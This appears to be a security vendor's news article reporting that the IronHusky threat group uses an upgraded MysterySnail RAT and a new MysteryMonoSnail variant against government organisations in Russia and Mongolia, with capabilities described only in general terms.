HQ/EMEAFind out how we can help your business
IronHusky hackers, a notorious Chinese-speaking threat group, target government organisations in Russia and Mongolia using an improved version of the MysterySnail RAT malware.
Security experts found this updated malware during investigations of recent attacks involving the RAT malware, which was installed through a malicious MMC script disguised as a Word document.
This script downloaded second-stage payloads and ensured persistence on compromised systems.
One of these payloads acts as an unidentified intermediary backdoor that enables file transfers between C2 servers and compromised devices, runs command shells, creates new processes, deletes files, and more.
IronHusky upgrades the MysterySnail RAT.
According to investigations, the telemetry shows files that trace back to the MysterySnail RAT malware, which we first reported in 2021.
In the observed infections, researchers found that the RAT was set up to run continuously on compromised machines as a service.
Shortly after the researchers blocked the recent intrusions related to the MysterySnail RAT, they noticed that the attackers continued their activities by deploying a streamlined version of the RAT. This new version, which consists of a single component, has been named MysteryMonoSnail.
The updated RAT malware supports a wide range of commands, allowing attackers to manage services on the infected device, execute shell commands, create and terminate processes, and manage files, among its other capabilities.
Initially discovered nearly four years ago, this latest backdoor closely resembles the original MysterySnail RAT. It was first identified in late August 2021 during extensive espionage operations against IT companies, military and defence contractors, and diplomatic bodies in Russia and Mongolia.
During those incidents, the IronHusky hacking group was recognised for using the malware on systems compromised through zero-day exploits targeting a Windows Win32k kernel driver vulnerability.
Researchers first identified this Chinese APT in 2017 while investigating a campaign aimed at Russian and Mongolian government entities, which was intended to gather intelligence on military negotiations between Russia and Mongolia.
A year later, they noted their exploitation of a Microsoft Office memory corruption vulnerability to spread RATs commonly leveraged by Chinese hackers.
Lastly, this report, released last week, includes IoCs and further technical details about the recent attacks by Chinese hackers using the upgraded remote access trojan.
